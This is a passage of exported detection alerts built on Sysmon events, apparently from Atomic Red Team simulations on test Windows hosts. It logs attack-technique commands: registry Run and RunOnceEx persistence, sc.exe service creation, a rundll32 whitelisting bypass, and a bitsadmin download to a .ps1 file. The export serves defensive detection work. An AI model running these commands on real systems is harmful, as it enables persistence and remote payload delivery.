(WinBuild.160101.0800) Windows Command Processor Microsoft® Windows® Operating System Microsoft Corporation "C:\Windows\system32\cmd.exe" /c "REG DELETE HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Depend /v 1 /f" C:\AtomicRedTeam\ MSEDGEWIN10\IEUser 747F3D96-D4B4-5D31-0000-002051090500 0x50951 1 High SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 747F3D96-D6F7-5D31-0000-00104ACE2500 3912 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational [T1059] Command-Line Interface,1563547506.137175,2019-07-19T18:45:06.137175+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "REG ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Depend /v 1 /d " C:\Path\AtomicRedTeam.dll ),1," 1 5 4 1 0 0x8000000000000000 3600 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 2019-07-19 14:45:06.056 747F3D96-D772-5D31-0000-0010BEE52800 3216 C:\Windows\System32\cmd.exe 10.0.17763.1 (WinBuild.160101.0800) Windows Command Processor Microsoft® Windows® Operating System Microsoft Corporation "C:\Windows\system32\cmd.exe" /c "REG ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Depend /v 1 /d " C:\Path\AtomicRedTeam.dll C:\AtomicRedTeam\ MSEDGEWIN10\IEUser 747F3D96-D4B4-5D31-0000-002051090500 0x50951 1 High SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 747F3D96-D6F7-5D31-0000-00104ACE2500 3912 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational [T1059] Command-Line Interface,1563547506.075725,2019-07-19T18:45:06.075725+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c ),1," 1 5 4 1 0 0x8000000000000000 3599 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 2019-07-19 14:44:53.388 747F3D96-D765-5D31-0000-001024C32800 4264 C:\Windows\System32\cmd.exe 10.0.17763.1 (WinBuild.160101.0800) Windows Command Processor Microsoft® Windows® Operating System Microsoft Corporation "C:\Windows\system32\cmd.exe" /c C:\AtomicRedTeam\ MSEDGEWIN10\IEUser 747F3D96-D4B4-5D31-0000-002051090500 0x50951 1 High SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 747F3D96-D6F7-5D31-0000-00104ACE2500 3912 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational [T1059] Command-Line Interface,1563547493.349171,2019-07-19T18:44:53.349171+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "REG DELETE " "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /V Atomic" Red "Team /f" ),1," 1 5 4 1 0 0x8000000000000000 3596 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 2019-07-19 14:44:53.314 747F3D96-D765-5D31-0000-0010D7BD2800 5824 C:\Windows\System32\cmd.exe 10.0.17763.1 (WinBuild.160101.0800) Windows Command Processor Microsoft® Windows® Operating System Microsoft Corporation "C:\Windows\system32\cmd.exe" /c "REG DELETE " "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /V Atomic" Red "Team /f" C:\AtomicRedTeam\ MSEDGEWIN10\IEUser 747F3D96-D4B4-5D31-0000-002051090500 0x50951 1 High SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 747F3D96-D6F7-5D31-0000-00104ACE2500 3912 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational [T1059] Command-Line Interface,1553037534.182862,2019-03-20T03:18:54.182862+04:00,,Threat,Low,Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd.exe ),1," 1 5 4 1 0 0x8000000000000000 1966634 Microsoft-Windows-Sysmon/Operational PC01.example.corp 2019-03-19 23:13:38.586 365ABB72-77A2-5C91-0000-00100A570100 1636 C:\Windows\System32\cmd.exe 6.1.7601.17514 (win7sp1_rtm.101119-1850) Windows Command Processor Microsoft® Windows® Operating System Microsoft Corporation cmd.exe C:\Windows\system32\ NT AUTHORITY\SYSTEM 365ABB72-777F-5C91-0000-0020E7030000 0x3e7 0 System MD5=AD7B9C14083B52BC532FBA5948342B98,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163 365ABB72-777F-5C91-0000-00100B590000 516 C:\Windows\System32\services.exe C:\Windows\system32\services.exe ",PC01.example.corp,Microsoft-Windows-Sysmon/Operational [T1059] Command-Line Interface,1553037534.172848,2019-03-20T03:18:54.172848+04:00,,Threat,Low,Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd.exe ),1," 1 5 4 1 0 0x8000000000000000 1966633 Microsoft-Windows-Sysmon/Operational PC01.example.corp 2019-03-19 23:13:38.576 365ABB72-77A2-5C91-0000-00106D560100 1628 C:\Windows\System32\cmd.exe 6.1.7601.17514 (win7sp1_rtm.101119-1850) Windows Command Processor Microsoft® Windows® Operating System Microsoft Corporation cmd.exe C:\Windows\system32\ NT AUTHORITY\SYSTEM 365ABB72-777F-5C91-0000-0020E7030000 0x3e7 0 System MD5=AD7B9C14083B52BC532FBA5948342B98,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163 365ABB72-777F-5C91-0000-00100B590000 516 C:\Windows\System32\services.exe C:\Windows\system32\services.exe ",PC01.example.corp,Microsoft-Windows-Sysmon/Operational [T1059] Command-Line Interface,1563547493.258049,2019-07-19T18:44:53.258049+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "REG ADD " "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /V Atomic" Red "Team /t REG_SZ /F /D C:\Path\AtomicRedTeam.exe" ),1," 1 5 4 1 0 0x8000000000000000 3593 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 2019-07-19 14:44:53.201 747F3D96-D765-5D31-0000-001027B72800 6584 C:\Windows\System32\cmd.exe 10.0.17763.1 (WinBuild.160101.0800) Windows Command Processor Microsoft® Windows® Operating System Microsoft Corporation "C:\Windows\system32\cmd.exe" /c "REG ADD " "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /V Atomic" Red "Team /t REG_SZ /F /D C:\Path\AtomicRedTeam.exe" C:\AtomicRedTeam\ MSEDGEWIN10\IEUser 747F3D96-D4B4-5D31-0000-002051090500 0x50951 1 High SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 747F3D96-D6F7-5D31-0000-00104ACE2500 3912 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational [T1059] Command-Line Interface,1563547466.222431,2019-07-19T18:44:26.222431+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c ),1," 1 5 4 1 0 0x8000000000000000 3588 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 2019-07-19 14:44:09.337 747F3D96-D739-5D31-0000-0010B2C22600 6896 C:\Windows\System32\cmd.exe 10.0.17763.1 (WinBuild.160101.0800) Windows Command Processor Microsoft® Windows® Operating System Microsoft Corporation "C:\Windows\system32\cmd.exe" /c C:\AtomicRedTeam\ MSEDGEWIN10\IEUser 747F3D96-D4B4-5D31-0000-002051090500 0x50951 1 High SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 747F3D96-D6F7-5D31-0000-00104ACE2500 3912 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational [T1059] Command-Line Interface,1563547449.278042,2019-07-19T18:44:09.278042+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "sc.exe delete AtomicTestService" ),1," 1 5 4 1 0 0x8000000000000000 3585 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 2019-07-19 14:44:09.225 747F3D96-D739-5D31-0000-0010E4BB2600 4744 C:\Windows\System32\cmd.exe 10.0.17763.1 (WinBuild.160101.0800) Windows Command Processor Microsoft® Windows® Operating System Microsoft Corporation "C:\Windows\system32\cmd.exe" /c "sc.exe delete AtomicTestService" C:\AtomicRedTeam\ MSEDGEWIN10\IEUser 747F3D96-D4B4-5D31-0000-002051090500 0x50951 1 High SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 747F3D96-D6F7-5D31-0000-00104ACE2500 3912 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational [T1059] Command-Line Interface,1563547449.17604,2019-07-19T18:44:09.176040+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "sc.exe stop AtomicTestService" ),1," 1 5 4 1 0 0x8000000000000000 3583 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 2019-07-19 14:44:09.142 747F3D96-D739-5D31-0000-00104CB72600 5000 C:\Windows\System32\cmd.exe 10.0.17763.1 (WinBuild.160101.0800) Windows Command Processor Microsoft® Windows® Operating System Microsoft Corporation "C:\Windows\system32\cmd.exe" /c "sc.exe stop AtomicTestService" C:\AtomicRedTeam\ MSEDGEWIN10\IEUser 747F3D96-D4B4-5D31-0000-002051090500 0x50951 1 High SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 747F3D96-D6F7-5D31-0000-00104ACE2500 3912 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational [ T1543 ] Sc.exe manipulating windows services,1563547448.307214,2019-07-19T18:44:08.307214+04:00,,Threat,High,"Found User (MSEDGEWIN10\IEUser) Trying to manipulate windows services usign Sc.exe with Command Line (sc.exe start AtomicTestService) and Parent Image :C:\Windows\System32\cmd.exe , Parent CommandLine ("C:\Windows\system32\cmd.exe" /c "sc.exe start AtomicTestService") in directory : ( C:\AtomicRedTeam\ )",1," 1 5 4 1 0 0x8000000000000000 3581 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 Persistence or Exec - Services Management 2019-07-19 14:44:08.269 747F3D96-D738-5D31-0000-0010D8AA2600 4260 C:\Windows\System32\sc.exe 10.0.17763.1 (WinBuild.160101.0800) Service Control Manager Configuration Tool Microsoft® Windows® Operating System Microsoft Corporation sc.exe start AtomicTestService C:\AtomicRedTeam\ MSEDGEWIN10\IEUser 747F3D96-D4B4-5D31-0000-002051090500 0x50951 1 High SHA1=622FA2729408E5F467A592223219DA7C547E7CC7,MD5=ABB56882148DE65D53ABFC55544A49A8,SHA256=78097C7CD0E57902536C60B7FA17528C313DB20869E5F944223A0BA4C801D39B,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF 747F3D96-D738-5D31-0000-001056A62600 2556 C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "sc.exe start AtomicTestService" ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational [T1059] Command-Line Interface,1563547448.288861,2019-07-19T18:44:08.288861+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "sc.exe start AtomicTestService" ),1," 1 5 4 1 0 0x8000000000000000 3580 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 2019-07-19 14:44:08.227 747F3D96-D738-5D31-0000-001056A62600 2556 C:\Windows\System32\cmd.exe 10.0.17763.1 (WinBuild.160101.0800) Windows Command Processor Microsoft® Windows® Operating System Microsoft Corporation "C:\Windows\system32\cmd.exe" /c "sc.exe start AtomicTestService" C:\AtomicRedTeam\ MSEDGEWIN10\IEUser 747F3D96-D4B4-5D31-0000-002051090500 0x50951 1 High SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 747F3D96-D6F7-5D31-0000-00104ACE2500 3912 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational [ T1543 ] Sc.exe manipulating windows services,1563547448.221461,2019-07-19T18:44:08.221461+04:00,,Threat,High,"Found User (MSEDGEWIN10\IEUser) Trying to manipulate windows services usign Sc.exe with Command Line (sc.exe create AtomicTestService binPath= C:\AtomicRedTeam\atomics\T1050\bin\AtomicService.exe) and Parent Image :C:\Windows\System32\cmd.exe , Parent CommandLine ("C:\Windows\system32\cmd.exe" /c "sc.exe create AtomicTestService binPath= C:\AtomicRedTeam\atomics\T1050\bin\AtomicService.exe") in directory : ( C:\AtomicRedTeam\ )",1," 1 5 4 1 0 0x8000000000000000 3577 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 Persistence or Exec - Services Management 2019-07-19 14:44:08.181 747F3D96-D738-5D31-0000-001098A22600 1700 C:\Windows\System32\sc.exe 10.0.17763.1 (WinBuild.160101.0800) Service Control Manager Configuration Tool Microsoft® Windows® Operating System Microsoft Corporation sc.exe create AtomicTestService binPath= C:\AtomicRedTeam\atomics\T1050\bin\AtomicService.exe C:\AtomicRedTeam\ MSEDGEWIN10\IEUser 747F3D96-D4B4-5D31-0000-002051090500 0x50951 1 High SHA1=622FA2729408E5F467A592223219DA7C547E7CC7,MD5=ABB56882148DE65D53ABFC55544A49A8,SHA256=78097C7CD0E57902536C60B7FA17528C313DB20869E5F944223A0BA4C801D39B,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF 747F3D96-D738-5D31-0000-001046A02600 4216 C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "sc.exe create AtomicTestService binPath= C:\AtomicRedTeam\atomics\T1050\bin\AtomicService.exe" ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational [T1059] Command-Line Interface,1563547448.185344,2019-07-19T18:44:08.185344+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "sc.exe create AtomicTestService binPath= C:\AtomicRedTeam\atomics\T1050\bin\AtomicService.exe" ),1," 1 5 4 1 0 0x8000000000000000 3576 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 2019-07-19 14:44:08.146 747F3D96-D738-5D31-0000-001046A02600 4216 C:\Windows\System32\cmd.exe 10.0.17763.1 (WinBuild.160101.0800) Windows Command Processor Microsoft® Windows® Operating System Microsoft Corporation "C:\Windows\system32\cmd.exe" /c "sc.exe create AtomicTestService binPath= C:\AtomicRedTeam\atomics\T1050\bin\AtomicService.exe" C:\AtomicRedTeam\ MSEDGEWIN10\IEUser 747F3D96-D4B4-5D31-0000-002051090500 0x50951 1 High SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 747F3D96-D6F7-5D31-0000-00104ACE2500 3912 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational [T1059] Command-Line Interface,1553031677.339046,2019-03-20T01:41:17.339046+04:00,,Threat,Low,Found User (EXAMPLE\user01) running image ( C:\Windows\System32\cmd.exe ) through command line ( C:\Windows\system32\cmd.EXE /c malwr.vbs ),1," 1 5 4 1 0 0x8000000000000000 1966563 Microsoft-Windows-Sysmon/Operational PC01.example.corp 2019-03-19 21:41:17.288 365ABB72-61FD-5C91-0000-0010536A1200 2340 C:\Windows\System32\cmd.exe 6.1.7601.17514 (win7sp1_rtm.101119-1850) Windows Command Processor Microsoft® Windows® Operating System Microsoft Corporation C:\Windows\system32\cmd.EXE /c malwr.vbs C:\Windows\system32\ EXAMPLE\user01 365ABB72-5417-5C91-0000-002035340300 0x33435 1 High MD5=AD7B9C14083B52BC532FBA5948342B98,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163 365ABB72-528D-5C91-0000-001062560000 484 C:\Windows\System32\services.exe C:\Windows\system32\services.exe ",PC01.example.corp,Microsoft-Windows-Sysmon/Operational [ T1086 ] Powershell with Suspicious Argument,1563547426.623217,2019-07-19T18:43:46.623217+04:00,,Threat,Critical,"Found User (MSEDGEWIN10\IEUser) run Suspicious PowerShell commands that include (powershell) in event with Command Line (powershell) and Parent Image :C:\Windows\System32\cmd.exe , Parent CommandLine ("C:\Windows\system32\cmd.exe") in directory : ( c:\AtomicRedTeam\ )",1," 1 5 4 1 0 0x8000000000000000 3574 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 2019-07-19 14:43:03.271 747F3D96-D6F7-5D31-0000-00104ACE2500 3912 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 10.0.17763.1 (WinBuild.160101.0800) Windows PowerShell Microsoft® Windows® Operating System Microsoft Corporation powershell c:\AtomicRedTeam\ MSEDGEWIN10\IEUser 747F3D96-D4B4-5D31-0000-002051090500 0x50951 1 High SHA1=6CBCE4A295C163791B60FC23D285E6D84F28EE4C,MD5=7353F60B1739074EB17C5F4DDDEFE239,SHA256=DE96A6E69944335375DC1AC238336066889D9FFC7D73628EF4FE1B1B160AB32C,IMPHASH=741776AACCFC5B71FF59832DCDCACE0F 747F3D96-D6ED-5D31-0000-0010C88A2500 3764 C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational [T1086] PowerShell Process found,1563547426.623217,2019-07-19T18:43:46.623217+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ) through command line ( powershell ),1," 1 5 4 1 0 0x8000000000000000 3574 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 2019-07-19 14:43:03.271 747F3D96-D6F7-5D31-0000-00104ACE2500 3912 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 10.0.17763.1 (WinBuild.160101.0800) Windows PowerShell Microsoft® Windows® Operating System Microsoft Corporation powershell c:\AtomicRedTeam\ MSEDGEWIN10\IEUser 747F3D96-D4B4-5D31-0000-002051090500 0x50951 1 High SHA1=6CBCE4A295C163791B60FC23D285E6D84F28EE4C,MD5=7353F60B1739074EB17C5F4DDDEFE239,SHA256=DE96A6E69944335375DC1AC238336066889D9FFC7D73628EF4FE1B1B160AB32C,IMPHASH=741776AACCFC5B71FF59832DCDCACE0F 747F3D96-D6ED-5D31-0000-0010C88A2500 3764 C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational [T1059] Command-Line Interface,1563547383.303217,2019-07-19T18:43:03.303217+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" ),1," 1 5 4 1 0 0x8000000000000000 3573 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 2019-07-19 14:42:53.277 747F3D96-D6ED-5D31-0000-0010C88A2500 3764 C:\Windows\System32\cmd.exe 10.0.17763.1 (WinBuild.160101.0800) Windows Command Processor Microsoft® Windows® Operating System Microsoft Corporation "C:\Windows\system32\cmd.exe" C:\Windows\system32\ MSEDGEWIN10\IEUser 747F3D96-D4B4-5D31-0000-002051090500 0x50951 1 High SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 747F3D96-D4B8-5D31-0000-0010A8CE0600 4416 C:\Windows\explorer.exe C:\Windows\Explorer.EXE ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational [T1059] Command-Line Interface,1563547710.660877,2019-07-19T18:48:30.660877+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "bitsadmin.exe /create AtomicBITS" ),1," 1 5 4 1 0 0x8000000000000000 3657 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 2019-07-19 14:48:30.619 747F3D96-D83E-5D31-0000-0010F0D02E00 752 C:\Windows\System32\cmd.exe 10.0.17763.1 (WinBuild.160101.0800) Windows Command Processor Microsoft® Windows® Operating System Microsoft Corporation "C:\Windows\system32\cmd.exe" /c "bitsadmin.exe /create AtomicBITS" C:\AtomicRedTeam\ MSEDGEWIN10\IEUser 747F3D96-D4B4-5D31-0000-002051090500 0x50951 1 High SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 747F3D96-D6F7-5D31-0000-00104ACE2500 3912 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational [T1117] Bypassing Application Whitelisting,1553030551.500169,2019-03-20T01:22:31.500169+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\System32\rundll32.exe) with commandline ( "C:\Windows\system32\rundll32.exe" C:\Windows\system32\shell32.dll,OpenAs_RunDLL C:\Windows\AppPatch\Custom\{3ad6ed23-adf8-4bc1-a898-4d695f482c64}.sdb)",1," 1 5 4 1 0 0x8000000000000000 1966541 Microsoft-Windows-Sysmon/Operational PC01.example.corp 2019-03-19 21:22:28.806 365ABB72-5D94-5C91-0000-001080E90F00 3840 C:\Windows\System32\rundll32.exe 6.1.7600.16385 (win7_rtm.090713-1255) Windows host process (Rundll32) Microsoft® Windows® Operating System Microsoft Corporation "C:\Windows\system32\rundll32.exe" C:\Windows\system32\shell32.dll,OpenAs_RunDLL C:\Windows\AppPatch\Custom\{3ad6ed23-adf8-4bc1-a898-4d695f482c64}.sdb C:\Windows\AppPatch\Custom\ EXAMPLE\user01 365ABB72-5417-5C91-0000-002035340300 0x33435 1 High MD5=C648901695E275C8F2AD04B687A68CE2,IMPHASH=239D911DFA7551A8B735680BC39B2238 365ABB72-543D-5C91-0000-001099A60300 2984 C:\Windows\explorer.exe C:\Windows\Explorer.EXE ",PC01.example.corp,Microsoft-Windows-Sysmon/Operational "[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1553030551.500169,2019-03-20T01:22:31.500169+04:00,,Threat,High,"Found User (EXAMPLE\user01) running image ( C:\Windows\System32\rundll32.exe ) through command line ( "C:\Windows\system32\rundll32.exe" C:\Windows\system32\shell32.dll,OpenAs_RunDLL C:\Windows\AppPatch\Custom\{3ad6ed23-adf8-4bc1-a898-4d695f482c64}.sdb )",1," 1 5 4 1 0 0x8000000000000000 1966541 Microsoft-Windows-Sysmon/Operational PC01.example.corp 2019-03-19 21:22:28.806 365ABB72-5D94-5C91-0000-001080E90F00 3840 C:\Windows\System32\rundll32.exe 6.1.7600.16385 (win7_rtm.090713-1255) Windows host process (Rundll32) Microsoft® Windows® Operating System Microsoft Corporation "C:\Windows\system32\rundll32.exe" C:\Windows\system32\shell32.dll,OpenAs_RunDLL C:\Windows\AppPatch\Custom\{3ad6ed23-adf8-4bc1-a898-4d695f482c64}.sdb C:\Windows\AppPatch\Custom\ EXAMPLE\user01 365ABB72-5417-5C91-0000-002035340300 0x33435 1 High MD5=C648901695E275C8F2AD04B687A68CE2,IMPHASH=239D911DFA7551A8B735680BC39B2238 365ABB72-543D-5C91-0000-001099A60300 2984 C:\Windows\explorer.exe C:\Windows\Explorer.EXE ",PC01.example.corp,Microsoft-Windows-Sysmon/Operational [T1059] Command-Line Interface,1563547710.640915,2019-07-19T18:48:30.640915+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c ),1," 1 5 4 1 0 0x8000000000000000 3656 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 2019-07-19 14:48:05.349 747F3D96-D825-5D31-0000-0010CF222C00 5808 C:\Windows\System32\cmd.exe 10.0.17763.1 (WinBuild.160101.0800) Windows Command Processor Microsoft® Windows® Operating System Microsoft Corporation "C:\Windows\system32\cmd.exe" /c C:\AtomicRedTeam\ MSEDGEWIN10\IEUser 747F3D96-D4B4-5D31-0000-002051090500 0x50951 1 High SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 747F3D96-D6F7-5D31-0000-00104ACE2500 3912 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational [T1085] Rundll32 Execution detected,1553030551.500169,2019-03-20T01:22:31.500169+04:00,,Threat,High,"Found User (EXAMPLE\user01) running image ( C:\Windows\System32\rundll32.exe ) through command line ( "C:\Windows\system32\rundll32.exe" C:\Windows\system32\shell32.dll,OpenAs_RunDLL C:\Windows\AppPatch\Custom\{3ad6ed23-adf8-4bc1-a898-4d695f482c64}.sdb )",1," 1 5 4 1 0 0x8000000000000000 1966541 Microsoft-Windows-Sysmon/Operational PC01.example.corp 2019-03-19 21:22:28.806 365ABB72-5D94-5C91-0000-001080E90F00 3840 C:\Windows\System32\rundll32.exe 6.1.7600.16385 (win7_rtm.090713-1255) Windows host process (Rundll32) Microsoft® Windows® Operating System Microsoft Corporation "C:\Windows\system32\rundll32.exe" C:\Windows\system32\shell32.dll,OpenAs_RunDLL C:\Windows\AppPatch\Custom\{3ad6ed23-adf8-4bc1-a898-4d695f482c64}.sdb C:\Windows\AppPatch\Custom\ EXAMPLE\user01 365ABB72-5417-5C91-0000-002035340300 0x33435 1 High MD5=C648901695E275C8F2AD04B687A68CE2,IMPHASH=239D911DFA7551A8B735680BC39B2238 365ABB72-543D-5C91-0000-001099A60300 2984 C:\Windows\explorer.exe C:\Windows\Explorer.EXE ",PC01.example.corp,Microsoft-Windows-Sysmon/Operational [T1059] Command-Line Interface,1563547684.13141,2019-07-19T18:48:04.131410+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "bitsadmin.exe /transfer /Download /priority Foreground https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1197/T1197.md C:\Windows\Temp\bitsadmin_flag.ps1" ),1," 1 5 4 1 0 0x8000000000000000 3654 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 2019-07-19 14:48:04.094 747F3D96-D824-5D31-0000-001023F42B00 6736 C:\Windows\System32\cmd.exe 10.0.17763.1 (WinBuild.160101.0800) Windows Command Processor Microsoft® Windows® Operating System Microsoft Corporation "C:\Windows\system32\cmd.exe" /c "bitsadmin.exe /transfer /Download /priority Foreground https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1197/T1197.md 